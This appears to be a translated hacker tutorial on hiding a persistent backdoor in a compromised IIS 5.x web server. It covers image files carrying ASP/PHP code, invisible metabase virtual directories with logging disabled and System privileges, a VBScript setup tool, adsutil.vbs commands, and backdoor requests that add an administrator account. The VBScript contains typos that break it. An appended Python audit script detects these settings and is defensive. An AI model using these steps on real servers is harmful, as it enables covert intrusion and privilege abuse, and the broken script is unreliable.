Two days ago I read an article on a new script-injection method, and I'm sure many people have since learned how to embed a script in a picture and how to get the ASP (or PHP) code inside that picture to run by pulling it in from a normal script file with the include function.
But this approach has a problem. Someone will ask: normally, if you want to insert a picture into a script web page, a simple HTML tag does it; if we replace that with an include, isn't it too obvious? Finding such a statement by hand in a large page is a bit of a hassle, but antivirus software doing signature lookups will certainly raise an alarm when it sees an include statement ending in .gif or .jpg.
And without a function like include, how does the ASP (or PHP) code inside a picture get executed? Ask the network administrator for help? So the question comes down to what can replace the function of include: the script injected into the picture can be changed at will, so we don't have to fear the antivirus, only that damned include.
What's the way? My first thought was to add an application mapping in IIS after the intrusion, so that picture extensions such as .gif are parsed by asp.dll (or php.exe), and to set the application protection of that virtual directory to Low so that our backdoor runs with System privileges. When the injected image script executes cmd commands, the command can be posted through a local form, or of course passed by GET:

Code:

    /uploadfiles/newsphoto/xx.coma1.gif?cmd=dir

This approach certainly works and gets past the need for include. But it still has one obvious shortcoming: antivirus software won't find it, but it can be seen clearly. As soon as the administrator looks at the application mappings, all our work is in vain.
Thinking about this, I suddenly remembered the well-known IIS vulnerability (affecting IIS 5.0 and 5.1): we can create an invisible virtual directory under any site (invisible in the Internet Service Manager, though still visible with adsutil.vbs). And because of the way IIS works, application mappings and application protection for a virtual directory are set separately from the defaults of the IIS site. Since the virtual directory is not visible, none of its attributes are visible either.
So we can set the properties of this directory without fear of the administrator discovering them. Now point this virtual directory at another physical directory on the server that is full of pictures. Which directory? I found a good one: the default Windows wallpaper directory; on my XP machine it is %systemroot%\web\wallpaper\ ... Oh, see what I mean? Once we modify two of those pictures to inject our script backdoor, map the picture extension in that directory to asp.dll (or php.exe), and set application protection to Low, we can run commands the way I described above.
And it runs with System privileges. Cool, isn't it? The administrator would never imagine that their own pictures could be a deadly backdoor! (Actually, the Shark already described this method in an article in X File, but his approach has a flaw: ASP (or PHP) files in a non-web directory are really suspicious once found. We use pictures instead, and I don't believe an administrator who sees a picture will get emotional and insist on tearing it open to see what's inside.) So how do you create this virtual directory? We can do it through the IIS graphical interface or directly with adsutil.vbs.
Before that, let me briefly explain the reason for this IIS vulnerability. We know that the IIS configuration file is Metabase.bin. This file, located at %systemroot%\system32\inetsrv\metabase.bin, contains almost all of the configuration information for IIS and is a very important system file. Simply put, everything we do in the Internet Service Manager is eventually saved in Metabase.bin. Besides operating on Metabase.bin through the Internet Service Manager in day-to-day system administration, Windows provides the script adsutil.vbs, which can also operate on Metabase.bin.
The structure of the metabase is similar to the registry: it is also a tree with concepts like keys, values, and items. In fact, in IIS 3 and PWS the metabase content was stored in the registry. The metabase has two primary keys: LM and Schema. Schema holds the system's default configuration; it is normally not modified and is very dangerous to alter, so neither the Internet Service Manager nor adsutil.vbs provides a way to modify it. LM contains the configuration for IIS's HTTP service, FTP service, SMTP service, and so on. Among them, LM/W3SVC/ holds the configuration for the HTTP service, which is what we are going to use.
It contains a value called ScriptMaps, which represents the script map. When ScriptMaps is set on a virtual directory, requests for files with the specified extension in that directory are handed to the specified ISAPI for execution. It is important to emphasize that the directory on which ScriptMaps is set need not actually exist: as long as a subkey exists under the root key of an HTTP instance in the metabase, IIS treats an HTTP request for a virtual directory with the same name as that key as legitimate and passes it to the mapped ISAPI.
That might have made everyone dizzy (including me), so here is a simple analogy. The metabase is like the registry. We know that when we install a program, the installer creates some necessary values in the registry; if we later don't uninstall it properly (for example, some friends delete a game simply by dragging it to the Recycle Bin), those registry items are left behind, useless, as registry garbage. It's the same in the metabase: when we create a virtual directory normally, some items are created in the metabase, and when we delete that virtual directory by abnormal means, those items remain. Unlike the registry, though, those leftover items still work: as long as we request that virtual directory over HTTP, IIS still serves it according to the original virtual directory settings in the metabase.
So even if the directory no longer exists, as long as it once existed, its settings still apply. Oh, you understand? (PS: still don't understand?) Then you'll have to read the Shark's article; he explains it better than I do. As for how to add an invisible virtual directory, the Shark's article made that very clear too, so I won't repeat it here. The following is a script for adding the invisible virtual directory; save it as Iis.vbs:

Code:

    Help1 = "iis back door setup for Win2000 by action Shark May 30 2004"
    Help2 = "Please enter the correct virtual directory name and mapped path, as follows"
    Help3 = "cscript.exe iis.vbs <virtual directory name> <mapping path>"
    Help4 = "For example: cscript.exe iis.vbs backdoor C:\"
    Set args = WScript.Arguments
    If args.Count < 2 Then
        WScript.Echo Help1
        WScript.Echo
        WScript.Echo Help2
        WScript.Echo Help3
        WScript.Echo
        WScript.Echo Help4
        WScript.Quit
    End If
    strvrname = args(0)    ' virtual directory name
    strrootpath = args(1)  ' virtual directory path
    Set checkvirtualdir = GetObject("IIS://localhost/w3svc/1/root")
    For Each vr In checkvirtualdir
        If vr.Name = "lhxy" Then
            foundt = "yes"
        Else
            foundt = "no"
        End If
    Next
    If foundt = "yes" Then
        WScript.Echo "Found that a lhxy directory has already been created; setting up the custom virtual directory"
        creatvdir
    Else
        WScript.Echo "Creating the lhxy directory and the custom folder, please wait!"
        creatlhxy
        creatvdir
    End If
    WScript.Echo "The name of the virtual directory you created is " & strvrname & ", and the mapped folder is " & strrootpath & "."
    WScript.Echo "Please visit http://ip/lhxy/" & strvrname & "/ to connect to the back door!"
    WScript.Echo "Congratulations! The back door setup is complete!"
    Sub creatlhxy()
        Set objdir = GetObject("IIS://localhost/w3svc/1/root")
        Set mydir = objdir.Create("IIsWebVirtualDir", "lhxy")
        mydir.accessread = True
        mydir.defaultdoc = mydir.defaultdoc
        mydir.appisolated = 0
        mydir.accessexecute = True
        mydir.dontlog = True
        mydir.accesssource = True
        mydir.enabledirbrowsing = True
        mydir.SetInfo
    End Sub
    Sub creatvdir()
        Set objvirtualdir = GetObject("IIS://localhost/w3svc/1/root/lhxy")
        Set virdir = objvirtualdir.Create("IIsWebVirtualDir", strvrname)
        virdir.accessread = True
        virdir.path = strrootpath
        virdir.defaultdoc =
        virdr.accessexecute = True
        virdir.accesswrite = True
        virdir.accesssource = True
        virdir.appisolated = 0
        virdir.dontlog = True
        virdir.enabledirbrowsing = True
        virdir.appcreate 0
        viddir.createprocessasuser = 0
        virdir.SetInfo
    End Sub
    WScript.Quit

I recall that Bugkidz also posted similar scripts. Oh, don't look too closely and hit me over it; go find them yourself, or ask the boy, hehe.
The following command adds asp.dll to the InProcessIsapiApps array via adsutil.vbs, so that all ASP scripts execute with System privileges:

Code:

    cscript adsutil.vbs set /w3svc/inprocessisapiapps c:\winnt\system32\idq.dll C:\winnt\system32\inetsrv\httpext.dll C:\winnt\system32\inetsrv\httpodbc.dll C:\winnt\system32\inetsrv\ssinc.dll C:\winnt\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll

But note: adsutil.vbs can only set the value, not append to it, so when you use adsutil.vbs you must list the original entries as well, otherwise they are lost. Separate entries are separated by spaces. Then add the application mapping to your virtual directory:

Code:

    cscript adsutil.vbs set w3svc/1/root/lhxy/wofeiwo/scriptmaps gif,c:\winnt\system32\inetsrv\asp.dll,1

My virtual directory here is lhxy/wofeiwo and the image extension is .gif; change them according to your actual situation. OK, let's see the effect:

Code:

    /uploadfiles/newsphoto/ofeiwoa1.gif?cmd=net user Wofeiwo W1o2f3e4i5w6o /add
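A defender-side check for exactly the three settings this article changes (ScriptMaps on a virtual directory, the InProcessIsapiApps list, and AppIsolated), as an added example that is not part of the original post or its scripts. It works on the values as strings in the form `cscript adsutil.vbs get <path>` prints them; the sample values below are constructed, and reading the live values out of the metabase is left to the operator.

```python
import ntpath

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png", ".bmp"}
SCRIPT_ENGINES = {"asp.dll", "php.exe"}
# InProcessIsapiApps entries the article shows as already present on the host;
# anything else in that list (asp.dll in the article's case) is reported.
BASELINE_INPROC = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}


def parse_scriptmap(entry):
    """Split 'ext,isapi_path,flags[,verbs]' into (ext, engine basename, flags).
    The extension gets a leading dot and lower case, so the article's 'gif,...'
    form and IIS's own '.asp,...' form compare alike."""
    parts = [p.strip() for p in entry.split(",")]
    if len(parts) < 3:
        raise ValueError("malformed ScriptMaps entry: %r" % entry)
    ext = parts[0].lower()
    if ext and not ext.startswith("."):
        ext = "." + ext
    return ext, ntpath.basename(parts[1]).lower(), int(parts[2])


def audit_scriptmaps(entries):
    """Image extensions routed to a script engine, as 'ext -> engine' strings."""
    hits = []
    for entry in entries:
        ext, engine, _flags = parse_scriptmap(entry)
        if ext in IMAGE_EXTS and engine in SCRIPT_ENGINES:
            hits.append("%s -> %s" % (ext, engine))
    return hits


def audit_inproc(apps):
    """DLLs in InProcessIsapiApps beyond the baseline (they run inside inetinfo.exe as LocalSystem)."""
    return sorted({ntpath.basename(a).lower() for a in apps} - BASELINE_INPROC)


def audit_vdir(name, app_isolated, script_maps, inproc_apps):
    """Findings for one virtual directory plus the server-wide in-process list."""
    findings = ["%s: AppIsolated=0 (application protection Low)" % name] if app_isolated == 0 else []
    findings += ["%s: ScriptMaps %s" % (name, h) for h in audit_scriptmaps(script_maps)]
    findings += ["W3SVC: %s added to InProcessIsapiApps" % d for d in audit_inproc(inproc_apps)]
    return findings


# Constructed sample values, mirroring the article's adsutil.vbs commands.
SAMPLE_INPROC = [r"c:\winnt\system32\idq.dll", r"C:\winnt\system32\inetsrv\httpext.dll",
                 r"C:\winnt\system32\inetsrv\httpodbc.dll", r"C:\winnt\system32\inetsrv\ssinc.dll",
                 r"C:\winnt\system32\msw3prt.dll", r"C:\winnt\system32\inetsrv\asp.dll"]
SAMPLE_MAPS = [r".asp,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE",
               r"gif,c:\winnt\system32\inetsrv\asp.dll,1"]

if __name__ == "__main__":
    for line in audit_vdir("W3SVC/1/Root/lhxy/wofeiwo", 0, SAMPLE_MAPS, SAMPLE_INPROC):
        print(line)
```

Run against every IIsWebVirtualDir node enumerated by adsutil.vbs, not just the ones the Internet Service Manager shows, since the article's whole point is that the hidden node still serves requests.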